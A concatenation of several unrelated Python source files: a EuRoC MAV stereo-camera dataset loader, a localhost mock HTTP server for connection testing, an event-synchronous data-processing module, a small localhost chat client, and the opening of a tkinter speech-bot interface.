                distCoeffs=self.distortion_coeffs,
                R=self.rectification_matrix,
                newCameraMatrix=self.projection_matrix,
                size=(width, height),
                m1type=cv2.CV_8U)

    def rectify(self, img):
        """Apply the precomputed remap; identity when rectification is off."""
        if self.remap is None:
            return img
        return cv2.remap(img, *self.remap, cv2.INTER_LINEAR)
class StereoCamera(object):
    """Rectified stereo pair; shared geometry is taken from the left camera."""

    def __init__(self, left_cam, right_cam):
        self.left_cam = left_cam
        self.right_cam = right_cam
        # The left camera is the reference: copy its geometry wholesale.
        for attr in ('width', 'height', 'intrinsic_matrix', 'extrinsic_matrix',
                     'fx', 'fy', 'cx', 'cy'):
            setattr(self, attr, getattr(left_cam, attr))
        # For a rectified pair P_right[0, 3] == -fx * baseline, so the ratio
        # of the two projection-matrix entries recovers the baseline.
        p_right = right_cam.projection_matrix
        self.baseline = abs(p_right[0, 3] / p_right[0, 0])
        self.focal_baseline = self.fx * self.baseline
class EuRoCDataset(object):  # Stereo + IMU
    '''
    path example: 'path/to/your/EuRoC Mav dataset/MH_01_easy'

    Builds the two hard-coded EuRoC camera models (cam0/cam1 calibration),
    the per-camera image readers and the combined StereoCamera.
    '''
    def __init__(self, path, rectify=True):
        # Calibration constants below are the published EuRoC MAV values for
        # cam0 (left) and cam1 (right); do not edit them by hand.
        self.left_cam = Camera(
            width=752, height=480,
            intrinsic_matrix = np.array([
                [458.654, 0.000000, 367.215],
                [0.000000, 457.296, 248.375],
                [0.000000, 0.000000, 1.000000]]),
            undistort_rectify=rectify,
            distortion_coeffs = np.array(
                [-0.28340811, 0.07395907, 0.00019359, 1.76187114e-05, 0.000000]),
            rectification_matrix = np.array([
                [0.999966347530033, -0.001422739138722922, 0.008079580483432283],
                [0.001365741834644127, 0.9999741760894847, 0.007055629199258132],
                [-0.008089410156878961, -0.007044357138835809, 0.9999424675829176]]),
            projection_matrix = np.array([
                [435.2046959714599, 0, 367.4517211914062, 0],
                [0, 435.2046959714599, 252.2008514404297, 0],
                [0., 0, 1, 0]]),
            extrinsic_matrix = np.array([
                [0.0148655429818, -0.999880929698, 0.00414029679422, -0.0216401454975],
                [0.999557249008, 0.0149672133247, 0.025715529948, -0.064676986768],
                [-0.0257744366974, 0.00375618835797, 0.999660727178, 0.00981073058949],
                [0.0, 0.0, 0.0, 1.0]])
            )
        self.right_cam = Camera(
            width=752, height=480,
            intrinsic_matrix = np.array([
                [457.587, 0.000000, 379.999],
                [0.000000, 456.134, 255.238],
                [0.000000, 0.000000, 1.000000]]),
            undistort_rectify=rectify,
            distortion_coeffs = np.array(
                [-0.28368365, 0.07451284, -0.00010473, -3.555907e-05, 0.0]),
            rectification_matrix = np.array([
                [0.9999633526194376, -0.003625811871560086, 0.007755443660172947],
                [0.003680398547259526, 0.9999684752771629, -0.007035845251224894],
                [-0.007729688520722713, 0.007064130529506649, 0.999945173484644]]),
            projection_matrix = np.array([
                [435.2046959714599, 0, 367.4517211914062, -47.90639384423901],
                [0, 435.2046959714599, 252.2008514404297, 0],
                [0, 0, 1, 0]]),
            extrinsic_matrix = np.array([
                [0.0125552670891, -0.999755099723, 0.0182237714554, -0.0198435579556],
                [0.999598781151, 0.0130119051815, 0.0251588363115, 0.0453689425024],
                [-0.0253898008918, 0.0179005838253, 0.999517347078, 0.00786212447038],
                [0.0, 0.0, 0.0, 1.0]])
            )
        path = os.path.expanduser(path)
        # list_imgs returns (paths, timestamps); both are forwarded to the reader.
        self.left = ImageReader(
            *self.list_imgs(os.path.join(path, 'mav0', 'cam0', 'data')),
            self.left_cam)
        self.right = ImageReader(
            *self.list_imgs(os.path.join(path, 'mav0', 'cam1', 'data')),
            self.right_cam)
        assert len(self.left) == len(self.right)
        self.timestamps = self.left.timestamps
        self.cam = StereoCamera(self.left_cam, self.right_cam)
    def list_imgs(self, dir):
        """Return ([sorted .png paths], [timestamps in seconds]) for dir.

        EuRoC filenames are nanosecond timestamps, hence the 1e-9 scaling.
        """
        xs = [_ for _ in os.listdir(dir) if _.endswith('.png')]
        xs = sorted(xs, key=lambda x:float(x[:-4]))
        timestamps = [float(_[:-4]) * 1e-9 for _ in xs]
        return [os.path.join(dir, _) for _ in xs], timestamps
    def __len__(self):
        return len(self.left)
|
httpserver.py | import socket
import sys
import threading
import time
import signal
import random
class MockHTTPServer:
    """
    A mock HTTP server that always responds with the configured status code,
    while counting the total and the maximum concurrent number of
    connections that were established.
    """

    def __init__(self, backlogSize=1000, port=0, fakeLattency=0, responseCode=200,
                 content="OK!"):
        """
        :param backlogSize: listen() backlog size
        :param port: TCP port to bind; 0 picks a free port (read it back via self.port)
        :param fakeLattency: upper bound (seconds) of a random delay before replying
        :param responseCode: numeric status code placed in the response line
        :param content: response body (str is stored UTF-8 encoded)
        """
        self.backlogSize = backlogSize
        self.port = port
        self.fakeLattency = fakeLattency
        self.responseCode = responseCode
        self.setContent(content)
        # List of active connections
        self.running = False
        self.thread = None
        self.connections = []
        self.connectionsLock = threading.Lock()
        # Counters
        self.maxConcurrentConnections = 0
        self.totalConnections = 0
        self.totalRequests = 0

    def setContent(self, content):
        """
        Change the response content (str is encoded as UTF-8, bytes kept as-is).
        """
        if type(content) is str:
            self.content = content.encode('utf-8')
        else:
            self.content = content

    def start(self):
        """
        Bind, listen and start the accept loop on a background thread.
        """
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(('127.0.0.1', self.port))
        # Read back the actual port (important when port=0 asked for an ephemeral one).
        self.port = self.sock.getsockname()[1]
        # Listen for incoming connections
        self.sock.listen(self.backlogSize)
        # Reset counters
        self.maxConcurrentConnections = 0
        self.totalConnections = 0
        # Start main thread
        self.running = True
        self.thread = threading.Thread(target=self._mainThread)
        self.thread.start()

    def stop(self):
        """
        Stop all active connections and join the main thread.
        """
        self.running = False
        with self.connectionsLock:
            for conn in self.connections:
                try:
                    conn.shutdown(socket.SHUT_WR)
                except Exception:
                    pass
                try:
                    conn.close()
                except Exception:
                    pass
            self.connections = []
        # Closing the listening socket unblocks accept() in the main thread.
        self.sock.close()
        self.thread.join()
        # GC the socket and the thread
        self.thread = None
        self.sock = None

    def _mainThread(self):
        """
        The main listening thread that spawns a new thread for each connection.
        """
        while self.running:
            try:
                connection, address = self.sock.accept()
            except OSError:
                # BUG FIX: stop() closing the socket surfaces as
                # ConnectionAbortedError on some platforms but as a plain
                # OSError (EBADF/EINVAL) on others; catching the base class
                # lets the accept loop terminate cleanly everywhere.
                break
            # Start a new thread for each connection
            self.totalConnections += 1
            t = threading.Thread(
                target=self._connectionnThread,
                args=(connection, address),
                daemon=True)
            t.start()

    def _forgetConnection(self, connection):
        """Drop a connection from the active list, tolerating double removal."""
        with self.connectionsLock:
            try:
                self.connections.remove(connection)
            except ValueError:
                pass

    def _connectionnThread(self, connection, address):
        """Per-connection loop: read requests, reply with the canned response."""
        with self.connectionsLock:
            self.connections.append(connection)
            if len(self.connections) > self.maxConcurrentConnections:
                self.maxConcurrentConnections = len(self.connections)
        while self.running:
            try:
                data = connection.recv(1024)
            except OSError:
                self._forgetConnection(connection)
                break
            if data:
                # Count valid requests
                if b'HTTP/1' in data:
                    self.totalRequests += 1
                # Optional artificial latency, then the mocked response.
                time.sleep(random.random() * self.fakeLattency)
                # BUG FIX: sendall instead of send — send() may write only a
                # prefix of the buffer and silently truncate the response.
                connection.sendall(b"HTTP/1.1 " + str(self.responseCode).encode('utf-8') +
                    b" OK\r\nContent-Type: text/plain\r\nContent-Length: " +
                    str(len(self.content)).encode('utf-8') + b"\r\n\r\n" + self.content)
            else:
                # recv() returned b'': the peer closed the connection.
                self._forgetConnection(connection)
                break
|
escape_stream.py | """
Welcome to the
Event Synchronous Categorisation And Processing Environment,
a high level, object oriented module which abstracts event processing to
high level objects that can get updated from live data.
"""
from threading import Thread
import time
from .es_wrappers import EventHandler_SFEL
import numpy as np
from . import tools
import operator
from . import plots
import copy
import matplotlib.pyplot as plt
from collections import deque
from multiprocessing import Process
from .testStream import createStream
class TestStream:
    """Controls a single background process that produces the test stream."""

    def __init__(self):
        # None until start() is called; afterwards holds the Process handle.
        self.test_stream_running = None

    def start(self):
        """Spawn the stream process unless one is already running."""
        if self.test_stream_running:
            print("Stream already running")
            return
        proc = Process(target=createStream)
        self.test_stream_running = proc
        proc.start()
# Module-level singleton used to start the demo/test data stream on demand.
test_stream = TestStream()
def initEscDataInstances():
    """Create one EscData instance per available event source and start the
    shared event loop.

    Returns a tools.Dict2obj mapping source id -> EscData.
    """
    eventWorker = EventWorker()
    sources = eventWorker._eventHandler.getSourceIDs()
    out = dict()
    for sourceId in sources:
        out[sourceId] = EscData(source=EventSource(sourceId, eventWorker))
    eventWorker.startEventLoop()
    return tools.Dict2obj(out)
class Scan:
    """Tracks the distinct (rounded) scan-parameter combinations seen so far.

    Each entry of ``_values`` is one scan step: a tuple of rounded parameter
    values (or the single placeholder ``None`` when no parameters are set).
    """

    def __init__(self, parameters=None, values=None, precision=None, sortValues=True):
        """
        parameters are EscData instances, that all should have a name.

        BUG FIX: ``values`` (and ``precision``) used to be mutable default
        arguments, so every default-constructed Scan shared one list and one
        dict; each instance now gets fresh objects.
        """
        if values is None:
            values = []
        if precision is None:
            precision = dict()
        self._parameters = parameters
        if self._parameters is None:
            self._parameterNames = None
            self._precision = None
            self._values = [None]
        else:
            self._parameterNames = [tp.name for tp in self._parameters]
            self._applyPrecision(precision)
            self._values = values
        self._sortValues = sortValues

    def _applyPrecision(self, precision=None):
        """Store per-parameter precisions (array, or {name: precision} dict)."""
        if precision is None:
            precision = dict()
        if isinstance(precision, np.ndarray):
            self._precision = precision
        else:
            self._precision = np.zeros(len(self._parameters))
            for key in precision.keys():
                if key in self._parameterNames:
                    self._precision[self._parameterNames.index(key)] = precision[key]

    def _roundParameters(self, parValues):
        """Round each parameter to its precision (precision 0 = no rounding)."""
        pv = np.asarray(parValues)
        ind = self._precision.nonzero()[0]
        if len(ind) > 0:
            pv[ind] = np.round(pv[ind] / self._precision[ind]) * self._precision[ind]
        return tuple(pv)

    def _isValid(self):
        """True when every scan parameter has a non-NaN value for this event."""
        if self._parameters is None:
            return True
        parValues = [tp._getEventData() for tp in self._parameters]
        return not np.isnan(parValues).any()

    def _append(self):
        """Appends scan parameter values in case they don't exist already.
        returns a boolean "is to append" and the index of the data
        ((None, None) when any parameter is NaN)."""
        if self._parameters is None:
            return False, 0
        parValues = [tp._getEventData() for tp in self._parameters]
        if np.isnan(parValues).any():
            return None, None
        parValues = self._roundParameters(parValues)
        if parValues in self._values:
            return False, self._values.index(parValues)
        else:
            self._values.append(parValues)
            return True, len(self._values) - 1

    def keys(self):
        return self._parameterNames

    def copy(self):
        """Shallow copy that shares parameters, values and precision."""
        return Scan(
            parameters=self._parameters, values=self._values, precision=self._precision
        )

    def __len__(self):
        return len(self._values)

    def __getitem__(self, item):
        """Column access by positional index/slice or by parameter name."""
        try:
            if type(item) is slice or type(item) is int:
                return np.asarray(self._values).T[item]
            elif type(item) is str:
                return np.asarray(self._values).T[self._parameterNames.index(item)]
        except Exception:
            # Anything unresolvable (unknown name, empty values) yields [].
            return []
class EscData:
    """Event-synchronous data: couples a data source with a DataManager that
    accumulates per-scan-step values as live events arrive."""

    def __init__(self, source=None, dataManager=None, scan=Scan()):
        # source is an object of different types,
        # e.g. event Collector,
        # processing object,
        # indexed file source
        # NOTE(review): the default ``scan=Scan()`` is evaluated once at
        # definition time, so all default-constructed EscData share a single
        # Scan instance — confirm whether that sharing is intended.
        self._source = source
        self.unit = self._source.unit
        self.name = self._source.name
        self.scan = scan
        if dataManager is None:
            dataManager = DataManager(scan=scan)
        self._dataManager = dataManager
        self.data = self._dataManager.data
        self.eventIds = self._dataManager.eventIds
        self._accPassively = False
        self._isesc = True  # duck-typing marker checked by isesc()
        self._lastEventId = None

    def shape(self):
        """Shape of the stored per-event data (delegated to the manager)."""
        return self._dataManager._get_shape()

    def lens(self):
        """Number of stored events per scan step."""
        return self._dataManager.lens()

    def _getEventDataRaw(self):
        # eventId = self._source.eventWorker.event.getEventId()
        # if eventId == self._lastEventId:
        # return
        return self._source.getEventData()

    def __len__(self):
        return len(self._dataManager)

    def _getEventData(self):
        """Current event's value, or None when scan parameters are invalid."""
        if self.scan._isValid():
            return self._getEventDataRaw()
        else:
            return None

    def _appendEventData(self):
        """Store the current event's value, skipping repeated event ids."""
        eventId = self._source.eventWorker.event.getEventId()
        if eventId == self._lastEventId:
            return
        data = self._getEventData()
        if not data is None:
            self._dataManager.append(data, eventId)
        self._lastEventId = eventId

    def _get_shape(self):
        pass

    def _update(self):
        self._appendEventData()

    def accumulate(self, do_accumulate=None):
        """Start/stop accumulating event data; with no argument, toggle."""
        if do_accumulate is None:
            print("Toggling accumulation to", ["on", "off"][self._is_accumulating()])
            do_accumulate = not self._is_accumulating()
        if do_accumulate:
            self._source.eventWorker.eventCallbacks.append(self._appendEventData)
        else:
            try:
                i = self._source.eventWorker.eventCallbacks.index(self._appendEventData)
                self._source.eventWorker.eventCallbacks.pop(i)
            except:
                pass

    def _is_accumulating(self):
        return self._appendEventData in self._source.eventWorker.eventCallbacks

    def digitize(self, target, edges, side="left"):
        # NOTE(review): dead code — shadowed by the digitize() defined below.
        pass

    def categorizeBy(self, escdata_category, binning_def, side="left"):
        """
        Create new EscData instance of same data source, but catagorized
        according to another EscData instance (escdata_category),
        binned according to binning_def, which can be
        a) a float providing a bin precision (the minimum binsize for continuous
        data). Will not predefine bins but create them according to
        incoming data
        b) a list of binning edges used e.g. by np.digitize.
        """
        if type(binning_def) is float:
            s = Scan(
                parameters=[escdata_category],
                precision={escdata_category.name: binning_def},
            )
        elif np.iterable(binning_def):
            s = digitizeScan(escdata_category, binning_def)
        return EscData(source=self._source, scan=s)

    def digitize(self, binning_def, side="left"):
        """
        Create new EscData instance of same data source, but digitized
        according to bins of the own data, could be
        a) a float providing a bin precision (the minimum binsize for continuous
        data). Will not predefine bins but create them according to
        incoming data
        b) a list of binning edges used e.g. by np.digitize.
        """
        if type(binning_def) is float:
            s = Scan(parameters=[self], precision={self.name: binning_def})
        elif np.iterable(binning_def):
            s = digitizeScan(self, binning_def)
        return EscData(source=self._source, scan=s)

    def mean(self):
        """Per-scan-step mean over accumulated events."""
        return [np.mean(td, axis=0) for td in self.data]

    def std(self):
        """Per-scan-step standard deviation over accumulated events."""
        return [np.std(td, axis=0) for td in self.data]

    def median(self):
        """Per-scan-step median over accumulated events."""
        return [np.median(td, axis=0) for td in self.data]

    def centerPerc(self, perc=68.3):
        """Per-scan-step central percentile band (default ~1 sigma width)."""
        pervals = [50 - perc / 2.0, 50 + perc / 2.0]
        return [np.percentile(td, pervals, axis=0) for td in self.data]

    def plotHist(self, update=0.5, axes=None):
        """Histogram plot; enables accumulation and optional live updating."""
        self.accumulate(1)
        if axes is None:
            fig = plt.figure("%s histogram" % self.name)
            axes = fig.gca()
        self._histPlot = plots.HistPlot(self)
        self._histPlot.plot()
        if update:
            self._histPlot.updateContinuously(interval=update)

    def plotMed(self, update=0.5, axes=None):
        """Median plot; enables accumulation and optional live updating."""
        self.accumulate(1)
        if axes is None:
            fig = plt.figure("%s median" % self.name)
            axes = fig.gca()
        self._medPlot = plots.Plot(self)
        self._medPlot.plot()
        if update:
            self._medPlot.updateContinuously(interval=update)

    def plotCorr(self, xVar, Npoints=300, update=0.5, axes=None):
        """Correlation plot of self vs xVar over the last Npoints events."""
        self.accumulate(1)
        xVar.accumulate(1)
        if axes is None:
            fig = plt.figure("%s %s Correlation" % (self.name, xVar.name))
            axes = fig.gca()
        self._corrPlot = plots.PlotCorrelation(xVar, self, Nlast=Npoints)
        self._corrPlot.plot()
        if update:
            self._corrPlot.updateContinuously(interval=update)
# class SortedData:
# def __init__(self,data,sorter,issorted):
# self.data = data
# self.sorter = sorter
# self.issorted = issorted
# def __getitem__(self,item):
# self.data.__getitem(self.sorter().)
class DataManager:
    """Stores, per scan step, a bounded deque of data values and the matching
    event ids."""

    def __init__(self, data=None, eventIds=None, maxlen=1000, scan=None):
        """
        BUG FIX: ``scan`` used to default to ``Scan()`` evaluated once at
        definition time, silently sharing a single Scan between every
        default-constructed DataManager; each instance now gets its own.
        """
        if scan is None:
            scan = Scan()
        self.scan = scan
        if data is None and eventIds is None:
            # One bounded deque per already-known scan step.
            self._data = [deque(maxlen=maxlen) for n in range(len(scan._values))]
            self._eventIds = [deque(maxlen=maxlen) for n in range(len(scan._values))]
        else:
            self._data = data
            self._eventIds = eventIds
        self._lastEventId = None

    def append(self, data, eventId, index=None):
        """Append one event's datum; consecutive duplicate event ids are
        ignored. When index is None the scan decides which step the event
        belongs to (possibly creating a new one)."""
        if eventId == self._lastEventId:
            return
        self._lastEventId = eventId
        doappend = False
        if index is None:
            doappend, index = self.scan._append()
        # doappend is None when the scan parameters were NaN: drop the event.
        if doappend is not None:
            if doappend:
                # NOTE(review): newly created steps get plain (unbounded)
                # lists, unlike the bounded deques from __init__ — confirm.
                self._data.append([])
                self._eventIds.append([])
            self._data[index].append(data)
            self._eventIds[index].append(eventId)

    def _getDataShape(self):
        """Shape of one stored datum, or None while everything is empty."""
        lens = self.lens()
        if max(lens) > 0:
            return np.shape(self.data[lens.index(max(lens))][0])
        else:
            return None

    def __len__(self):
        return len(self.data)

    def lens(self):
        """Per-step event count; prints (and yields None) on a mismatch
        between the data and event-id containers."""
        le = [
            len(te) if len(te) == len(td) else print("Trouble in step %d" % n)
            for n, (te, td) in enumerate(zip(self._eventIds, self._data))
        ]
        return le

    def _get_data(self):
        return self._data

    def _get_eventIds(self):
        return self._eventIds

    data = property(_get_data)
    eventIds = property(_get_eventIds)
class EventSource:
    """Adapter that reads one named source from the worker's current event."""

    def __init__(self, sourceId, eventWorker, unit="a.u."):
        self.name = sourceId
        self.unit = unit
        self.eventWorker = eventWorker

    def getEventData(self):
        """Fetch this source's value from the event currently held by the worker."""
        current_event = self.eventWorker.event
        return current_event.getFromSource(self.name)
class ProcSource:
    """Adapter exposing one return value of a processing object as a source."""

    def __init__(self, procObj, eventWorker, returnIndex=0, name=None, unit="a.u."):
        self.name = name
        self.unit = unit
        self.eventWorker = eventWorker
        self.procObj = procObj
        self.returnIndex = returnIndex

    def getEventData(self):
        """Run the processor if it produced fresh values, propagate them to
        sibling outputs, and return this source's slot."""
        produced_fresh = self.procObj.getEventData()
        if produced_fresh:
            self.procObj.updateChildren(self)
        return self.procObj.ret_values[self.returnIndex]
class FileSource:
    """Placeholder for a file-backed source with an indexed file,
    i.e. the functionality of ixppy; not implemented yet."""
    pass
class EventWorker:
    """Pulls events from an event handler and fans them out to registered
    callbacks, optionally on a daemon thread."""

    def __init__(self, eventHandler=None):
        """
        BUG FIX: the handler used to be a mutable default argument
        (``eventHandler=EventHandler_SFEL()``), i.e. one shared instance for
        every default-constructed worker; each worker now gets its own.
        """
        if eventHandler is None:
            eventHandler = EventHandler_SFEL()
        self._eventHandler = eventHandler
        self.eventCallbacks = []
        self.sources = []
        self.event = None
        # Initialised here so eventLoop() can be called before startEventLoop().
        self.running = False
        self.initSourceFunc = eventHandler.registerSource
        self.eventGenerator = eventHandler.eventGenerator
        self._lastTime = time.time()
        self.runningFrequency = 0.0

    def registerSource(self, sourceID):
        """Register a source id with the underlying event handler."""
        self.initSourceFunc(sourceID)

    def eventLoop(self):
        """Consume events, update the event-rate estimate and run callbacks."""
        for event in self.eventGenerator():
            self.event = event
            ttime = time.time()
            self.runningFrequency = 1 / (ttime - self._lastTime)
            self._lastTime = ttime
            for ecb in self.eventCallbacks:
                ecb()
            # event has getFromSource(sourcename) method
            if not self.running:
                break

    def startEventLoop(self):
        """Run eventLoop() on a daemon thread."""
        self.loopThread = Thread(target=self.eventLoop)
        # daemon attribute replaces the deprecated setDaemon() call.
        self.loopThread.daemon = True
        self.running = True
        self.loopThread.start()

    def stopEventLoop(self):
        """Ask the loop to stop after the next event."""
        self.running = False
class ProcObj:
    """Wraps a function whose arguments may be EscData instances; creates
    EscData children for its (tuple of) return values and re-evaluates the
    function at most once per event id."""

    def __init__(
        self,
        func,
        args=[],
        kwargs=dict(),
        returns_is_esc=[True],
        returns_names=None,
        returns_units=None,
        objects=[],
        scan=None,
        scanIndex=None,
    ):
        # NOTE(review): the mutable default arguments are kept for interface
        # stability; none of them is mutated inside this class.
        self.func = func
        self.args = args
        self.kwargs = kwargs
        self.objects = objects
        self.returns_is_esc = returns_is_esc
        self.returns_names = returns_names
        self.returns_units = returns_units
        # Which positional/keyword arguments are EscData (re-read per event).
        self.args_is_esc = [isesc(targ) for targ in args]
        self.nonesc_returns = []
        self.kwargs_is_esc = {name: isesc(value) for name, value in kwargs.items()}
        self.scan = scan
        if scan is None:
            if scanIndex is not None:
                self.scan = self.getEscArgs()[scanIndex].scan.copy()
            else:
                # BUG FIX: this used to assign the fresh Scan to the *local*
                # name ``scan``, leaving self.scan = None and crashing later
                # in createChildren().
                self.scan = Scan()
        self.children = None
        self.eventWorker = None
        self._last_processed_eventId = None
        self.getEventWorker()

    def getEscArgs(self):
        """Positional arguments that are EscData instances."""
        escArgs = []
        for n in np.nonzero(self.args_is_esc)[0]:
            escArgs.append(self.args[n])
        return escArgs

    def getEscKwargs(self):
        """Keyword arguments that are EscData instances."""
        escKwargs = dict()
        for key, isEsc in self.kwargs_is_esc.items():
            if isEsc:
                escKwargs[key] = self.kwargs[key]
        return escKwargs

    def getEventWorker(self):
        """Adopt the (single) event worker shared by all EscData arguments."""
        allEsc = self.getEscArgs() + list(self.getEscKwargs().values())
        allEventWorkers = [te._source.eventWorker for te in allEsc]
        assert all(
            x == allEventWorkers[0] for x in allEventWorkers
        ), "Problem with eventWorkers! seems there is more than one! "
        self.eventWorker = allEventWorkers[0]

    def createChildren(self):
        """Create one EscData child per esc-flagged return value."""
        self.children = []
        # Loop variable renamed so it no longer shadows the isesc() function.
        for returnIndex, is_esc_return in enumerate(self.returns_is_esc):
            if is_esc_return:
                if self.returns_names is None:
                    name = "none"
                else:
                    name = self.returns_names[returnIndex]
                if self.returns_units is None:
                    unit = "none"
                else:
                    unit = self.returns_units[returnIndex]
                newscan = self.scan.copy()
                self.children.append(
                    EscData(
                        source=ProcSource(
                            self,
                            name=name,
                            unit=unit,
                            eventWorker=self.eventWorker,
                            returnIndex=returnIndex,
                        ),
                        scan=newscan,
                    )
                )
        return self.children

    def getEventData(self):
        """Evaluate func for the current event (at most once per event id).

        Returns True when fresh return values were produced, False when an
        input was missing; None when the event was already processed.
        """
        tid = self.eventWorker.event.getEventId()
        if not self._last_processed_eventId == tid:
            args = [
                targ._getEventData() if aie else targ
                for targ, aie in zip(self.args, self.args_is_esc)
            ]
            kwargs = {
                key: tkwarg._getEventData() if self.kwargs_is_esc[key] else tkwarg
                for key, tkwarg in self.kwargs.items()
            }
            self._last_processed_eventId = tid
            if not any(
                [arg is None for arg in args] + [arg is None for arg in kwargs.values()]
            ):
                ret_values = self.func(*args, **kwargs)
                # Normalise single returns to a 1-tuple.
                if not type(ret_values) is tuple:
                    ret_values = (ret_values,)
                self.ret_values = ret_values
                return True
            else:
                return False

    def updateChildren(self, caller):
        """Append fresh event data to every child except the calling source."""
        for child in self.children:
            if not child._source is caller:
                child._update()
def isesc(obj):
    """Return obj._isesc when present (duck-typing marker for EscData),
    otherwise False.

    BUG FIX: the original used a bare ``except:`` which also swallowed
    SystemExit/KeyboardInterrupt; getattr with a default handles exactly the
    missing-attribute case.
    """
    return getattr(obj, '_isesc', False)
def digitize(data, edges, side="left"):
    """Map data values onto the bins delimited by ``edges``.

    Returns (bincenter, edgelower, edgeupper); values falling outside
    [edges[0], edges[-1]] map to NaN. Scalar input yields scalar output.
    """
    data = np.atleast_1d(data)
    edges = np.asarray(edges)
    assert (np.diff(edges) >= 0).all(), "edges must be monotonic, increasing"
    bin_idx = edges.searchsorted(data, side=side)
    # Index 0 or len(edges) means the value lies outside the outermost edges.
    outside = np.logical_or(bin_idx == 0, bin_idx == len(edges))
    inside = ~outside
    lower = np.nan * np.ones_like(data)
    upper = np.nan * np.ones_like(data)
    lower[inside] = edges[bin_idx[inside] - 1]
    upper[inside] = edges[bin_idx[inside]]
    centers = (upper + lower) / 2.0
    return np.squeeze(centers), np.squeeze(lower), np.squeeze(upper)
def digitizeEsc(escdata, edges, side="left"):
    """Wrap ``digitize`` in a ProcObj and return its three EscData children
    (bin center, lower edge, upper edge) for ``escdata``.

    NOTE(review): ``side`` is accepted but not forwarded to ``digitize``;
    the processor always runs with digitize's default — confirm intent.
    """
    po = ProcObj(
        digitize,
        args=[escdata, edges],
        returns_is_esc=[True, True, True],
        returns_names=[
            "%s_bincenter" % escdata.name,
            "%s_edgelower" % escdata.name,
            "%s_edgeupper" % escdata.name,
        ],
        returns_units=[escdata.unit] * 3,
        scan=escdata.scan,
    )
    return po.createChildren()
def digitizeScan(escdata, edges, side="left"):
    """Build a Scan whose steps are the bins defined by ``edges``.

    Each scan value is one bin's (center, lower edge, upper edge) tuple; the
    scan parameters are the digitized EscData children of ``escdata``.
    """
    escdats = digitizeEsc(escdata, edges, side=side)
    values = [
        (sum(edges[n : n + 2]) / 2.0, edges[n], edges[n + 1])
        for n in range(len(edges) - 1)
    ]
    return Scan(escdats, values=values)
def wrapFunc_singleOutput(func, name=None, unit=None, scan=None):
    """Turn a plain function into one returning a single EscData output.

    ``name``/``unit`` label the derived data; ``scan`` (when given) becomes
    the result's scan, otherwise an empty Scan is used.
    """
    if name is None:
        name = "none"
    if unit is None:
        unit = "none"
    def newFunc(*args, **kwargs):
        # BUG FIX: keyword arguments used to be accepted and silently
        # dropped, and the ``scan`` parameter was ignored in favour of a
        # hard-coded Scan(None).
        p = ProcObj(
            func,
            args=args,
            kwargs=kwargs,
            returns_is_esc=[True],
            returns_names=[name],
            returns_units=[unit],
            scan=scan if scan is not None else Scan(None),
        )
        return p.createChildren()[0]
    return newFunc
def _wrapOperatorJoin(func, symbol):
    """Build an EscData dunder for a binary/variadic operator ``func``.

    The derived EscData's name and unit are the operand names/units joined
    by the operator symbol and wrapped in parentheses.
    """
    def wrapped(*args):
        labels = [arg.name if hasattr(arg, "name") else type(arg).__name__
                  for arg in args]
        joined_name = "(" + (" %s " % symbol).join(labels) + ")"
        unit_labels = [arg.unit if hasattr(arg, "unit") else "no unit"
                       for arg in args]
        joined_unit = "(" + (" %s " % symbol).join(unit_labels) + ")"
        proc = ProcObj(
            func,
            args=args,
            returns_is_esc=[True],
            returns_names=[joined_name],
            returns_units=[joined_unit],
            scan=args[0].scan,
        )
        return proc.createChildren()[0]
    return wrapped
def _wrapOperatorSingle(func, symbol):
    """Build an EscData dunder for a unary operator ``func``.

    The derived name is "(symbol name)"; the unit string is produced by the
    same join construction the binary wrapper uses.
    """
    def wrapped(*args):
        primary_name = args[0].name
        label = "(" + "%s %s" % (symbol, primary_name) + ")"
        unit_labels = [arg.unit for arg in args]
        joined_unit = "(" + ("%s %s" % (symbol, primary_name)).join(unit_labels) + ")"
        proc = ProcObj(
            func,
            args=args,
            returns_is_esc=[True],
            returns_names=[label],
            returns_units=[joined_unit],
            scan=args[0].scan,
        )
        return proc.createChildren()[0]
    return wrapped
# (function, display symbol) pairs for binary operators; each is attached to
# EscData below so that e.g. ``a + b`` yields a new processed EscData.
_operatorsJoin = [
    (operator.add, "+"),
    (operator.contains, "in"),
    (operator.truediv, "/"),
    (operator.floordiv, "//"),
    (operator.and_, "&"),
    (operator.xor, "^"),
    (operator.or_, "|"),
    (operator.pow, "**"),
    (operator.is_, "is"),
    (operator.is_not, "is not"),
    (operator.lshift, "<<"),
    (operator.mod, "%"),
    (operator.mul, "*"),
    (operator.rshift, ">>"),
    (operator.sub, "-"),
    (operator.lt, "<"),
    (operator.le, "<="),
    (operator.eq, "=="),
    (operator.ne, "!="),
    (operator.ge, ">="),
    (operator.gt, ">"),
]
# Unary operators get the single-operand wrapper.
_operatorsSingle = [
    (operator.invert, "~"),
    (operator.neg, "-"),
    (operator.not_, "not"),
    (operator.pos, "pos"),
]
# Install the operator dunders on EscData.
# BUG FIX: operator.and_.__name__ is 'and_' (trailing underscore avoids the
# keyword), so "__%s__" produced dead attributes like '__and___' and the
# '&'/'|' operators never worked; rstrip('_') yields the real dunder names.
for opJoin, symbol in _operatorsJoin:
    setattr(EscData, "__%s__" % opJoin.__name__.rstrip("_"), _wrapOperatorJoin(opJoin, symbol))
for opSing, symbol in _operatorsSingle:
    setattr(EscData, "__%s__" % opSing.__name__.rstrip("_"), _wrapOperatorSingle(opSing, symbol))
|
client3.py | import socket
from threading import Thread
# Connect to the chat server once at import time; both worker threads below
# share this single socket.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', 8888))
def send_message():
    # Forever: read one line from stdin and push it to the server as UTF-8.
    while True:
        sock.send(input().encode('utf-8'))
def receive_message():
    # Forever: read up to 1024 bytes from the server and print them decoded.
    while True:
        data = sock.recv(1024)
        print(data.decode('utf-8'))
# Run sending and receiving concurrently so the client can do both at once.
send_thread = Thread(target=send_message)
get_thread = Thread(target=receive_message)
send_thread.start()
get_thread.start()
interface.py | from tkinter import *
import tkinter.font as font
import threading
import speech_recognition as sr
import win32com.client
import json
import Operations.operations
import random
# Shared speech recogniser and Windows SAPI text-to-speech voice.
l=sr.Recognizer()
speaker=win32com.client.Dispatch("SAPI.SpVoice")
def homepage():
    """Build and run the main Speak Bot window with one image button per feature.

    NOTE(review): the buttons have no ``command=`` bound here, so clicking
    them does nothing; the features are triggered by voice via start().
    """
    global screen1
    screen1=Tk()
    myFont = font.Font(size=50)
    screen1.configure(bg="#93bfed")
    screen1.title("Speak Bot")
    screen1.geometry('1920x1080')
    # Load the button artwork; subsample() shrinks images to fit the layout.
